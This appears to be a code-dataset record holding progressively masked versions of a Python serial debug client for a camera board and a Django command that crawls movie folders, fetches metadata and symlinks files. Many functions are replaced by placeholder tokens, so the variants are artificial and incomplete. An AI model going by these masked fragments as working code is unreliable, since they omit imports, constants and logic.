__serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,819 | 99bdc5db120de0f0658cb37ed46bf3df2f1e77f2 | import os
import json
import datetime
import re
import asyncio
import aiohttp
from urllib.request import urlopen
from urllib.parse import urlencode
from django.core.handlers.base import sync_to_async
from django.core.management.base import BaseCommand
from application.models import Movie, NewMovieNotification, MovieDirectory
from django.conf import settings
from django.utils import timezone
from application.resolvers import ResolverSet
MOVIES_EXT = [
'.mp4',
'.mkv',
'.avi',
'.flv',
'.mov',
'.webm',
]
class Report:
def __init__(self):
self.fail = 0
self.success = 0
self.poster = 0
self.start_time = None
    def start(self):
        self.start_time = datetime.datetime.now()
    def display(self):
        total_time = datetime.datetime.now() - self.start_time
total = self.fail + self.success
if not total:
print("You media directory ({}) does not contain any new film.".format(list(MovieDirectory.objects.all())))
return
print("")
print("Crawler report")
print("===============")
print("")
print("Success {:>5} ({:>6.2f}%)".format(self.success, self.success/total*100))
print("Posters {:>5} ({:>6.2f}%)".format(self.poster, self.poster/total*100))
print("Fails {:>5} ({:>6.2f}%)".format(self.fail, self.fail/total*100))
print("")
print("Total {:>5}".format(total))
print("Time {}".format(total_time))
class Crawler:
def __init__(self, cmd, loop, aiohttp_session, report):
self.command = cmd
self.loop = loop
self.aiohttp_session = aiohttp_session
self.report = report
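        # Cache every known Movie by filesystem path so re-crawls update existing rows instead of creating duplicates.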
self.movies = {m.path: m for m in Movie.objects.all()}
self.resolver_set = ResolverSet(loop, aiohttp_session)
def queue_update_tasks(self, movie_directory, tasks):
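        # Walk the directory tree and schedule one async handle_file() task per supported, full-size video file.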
path = movie_directory.path
for dirname, subdirs, files in os.walk(path):
for filename in files:
name, ext = os.path.splitext(filename)
path = os.path.join(dirname, filename)
if ext not in MOVIES_EXT:
self.message(self.command.style.WARNING("UNSUPPORTED EXTENSION %s" % ext), path)
continue
statinfo = os.stat(path)
                if statinfo.st_size < 256 * 2**20:  # skip files smaller than 256MB; most likely samples or trailers
                    self.message(self.command.style.WARNING("SAMPLE"), path)
                    continue
                tasks.append(asyncio.ensure_future(self.handle_file(name, path)))
def message(self, tag, message):
try:
self.command.stdout.write("[ {:^40} ] {}".format(tag, message))
except UnicodeEncodeError:
pass
async def handle_file(self, name, path):
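        # Resolve metadata for a single video file, save it, and notify users when the movie is new.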
if path in self.movies.keys():
if not settings.ALLOW_DB_UPDATE:
return
# update old movies data.
movie = self.movies[path]
update = True
else:
movie = Movie()
update = False
movie = await self.resolver_set.resolve(path, movie)
if not movie.poster:
self.message(self.command.style.NOTICE('NO POSTER'), path)
else:
self.report.poster += 1
self.report.success += 1
movie.path = path
await sync_to_async(movie.save)()
if not update:
await sync_to_async(NewMovieNotification.notify_all)(movie)
self.symlink(path)
self.message(self.command.style.SUCCESS("ADDED"), "%s as %s" % (path, movie.title))
else:
self.message(self.command.style.SUCCESS("UPDATED"), "%s as %s" % (path, movie.title))
def symlink(self, path):
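        # Link the source file into MEDIA_ROOT/films so the web application can serve it directly.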
destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.basename(path))
if os.path.islink(destination):
os.remove(destination)
os.symlink(path, destination)
class Command(BaseCommand):
help = "Update local movie list"
def handle(self, *args, **options):
report = Report()
report.start()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
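        # One shared aiohttp session; AIOHTTP_LIMIT caps how many metadata requests run concurrently.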
connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT, force_close=True, loop=loop)
aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)
tasks = []
crawler = Crawler(self, loop, aiohttp_session, report)
for directory in MovieDirectory.objects.all():
crawler.queue_update_tasks(directory, tasks)
if tasks:
loop.run_until_complete(asyncio.wait(tasks))
loop.run_until_complete(aiohttp_session.close())
loop.close()
# Delete movies with no path. Those entries are made possible since
# movies can be saved in the resolvers.
Movie.objects.filter(path="").delete()
report.display()
| [
"import os\nimport json\nimport datetime\nimport re\nimport asyncio\nimport aiohttp\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode\nfrom django.core.handlers.base import sync_to_async\nfrom django.core.management.base import BaseCommand\nfrom application.models import Movie, NewMovieNotification, MovieDirectory\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom application.resolvers import ResolverSet\n\nMOVIES_EXT = [\n '.mp4',\n '.mkv',\n '.avi',\n '.flv',\n '.mov',\n '.webm',\n]\n\n\nclass Report:\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print(\"You media directory ({}) does not contain any new film.\".format(list(MovieDirectory.objects.all())))\n return\n print(\"\")\n print(\"Crawler report\")\n print(\"===============\")\n\n print(\"\")\n print(\"Success {:>5} ({:>6.2f}%)\".format(self.success, self.success/total*100))\n print(\"Posters {:>5} ({:>6.2f}%)\".format(self.poster, self.poster/total*100))\n print(\"Fails {:>5} ({:>6.2f}%)\".format(self.fail, self.fail/total*100))\n\n print(\"\")\n print(\"Total {:>5}\".format(total))\n print(\"Time {}\".format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\"UNSUPPORTED EXTENSION %s\" % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2**20: # size < 256MB\n continue\n self.message(self.command.style.WARNING(\"SAMPLE\"), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name, path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write(\"[ {:^40} ] {}\".format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n # update old movies data.\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n\n movie = await self.resolver_set.resolve(path, movie)\n\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n\n self.report.success += 1\n movie.path = path\n\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS(\"ADDED\"), \"%s as %s\" % (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS(\"UPDATED\"), \"%s as %s\" % (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = \"Update local movie list\"\n\n def handle(self, *args, **options):\n report = 
Report()\n report.start()\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT, force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n\n crawler = Crawler(self, loop, aiohttp_session, report)\n\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n\n # Delete movies with no path. Those entries are made possible since\n # movies can be saved in the resolvers.\n Movie.objects.filter(path=\"\").delete()\n\n report.display()\n",
"import os\nimport json\nimport datetime\nimport re\nimport asyncio\nimport aiohttp\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode\nfrom django.core.handlers.base import sync_to_async\nfrom django.core.management.base import BaseCommand\nfrom application.models import Movie, NewMovieNotification, MovieDirectory\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom application.resolvers import ResolverSet\nMOVIES_EXT = ['.mp4', '.mkv', '.avi', '.flv', '.mov', '.webm']\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print('You media directory ({}) does not contain any new film.'\n .format(list(MovieDirectory.objects.all())))\n return\n print('')\n print('Crawler report')\n print('===============')\n print('')\n print('Success {:>5} ({:>6.2f}%)'.format(self.success, self.success /\n total * 100))\n print('Posters {:>5} ({:>6.2f}%)'.format(self.poster, self.poster /\n total * 100))\n print('Fails {:>5} ({:>6.2f}%)'.format(self.fail, self.fail /\n total * 100))\n print('')\n print('Total {:>5}'.format(total))\n print('Time {}'.format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n 
asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\nMOVIES_EXT = ['.mp4', '.mkv', '.avi', '.flv', '.mov', '.webm']\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print('You media directory ({}) does not contain any new film.'\n .format(list(MovieDirectory.objects.all())))\n return\n print('')\n print('Crawler report')\n print('===============')\n print('')\n print('Success {:>5} ({:>6.2f}%)'.format(self.success, self.success /\n total * 100))\n print('Posters {:>5} ({:>6.2f}%)'.format(self.poster, self.poster /\n total * 100))\n print('Fails {:>5} ({:>6.2f}%)'.format(self.fail, self.fail /\n total * 100))\n print('')\n print('Total {:>5}'.format(total))\n print('Time {}'.format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n 
loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n\n def __init__(self):\n self.fail = 0\n self.success = 0\n self.poster = 0\n self.start_time = None\n\n def start(self):\n Report.start_time = datetime.datetime.now()\n\n def display(self):\n total_time = datetime.datetime.now() - Report.start_time\n total = self.fail + self.success\n if not total:\n print('You media directory ({}) does not contain any new film.'\n .format(list(MovieDirectory.objects.all())))\n return\n print('')\n print('Crawler report')\n print('===============')\n print('')\n print('Success {:>5} ({:>6.2f}%)'.format(self.success, self.success /\n total * 100))\n print('Posters {:>5} ({:>6.2f}%)'.format(self.poster, self.poster /\n total * 100))\n print('Fails {:>5} ({:>6.2f}%)'.format(self.fail, self.fail /\n total * 100))\n print('')\n print('Total {:>5}'.format(total))\n print('Time {}'.format(total_time))\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not 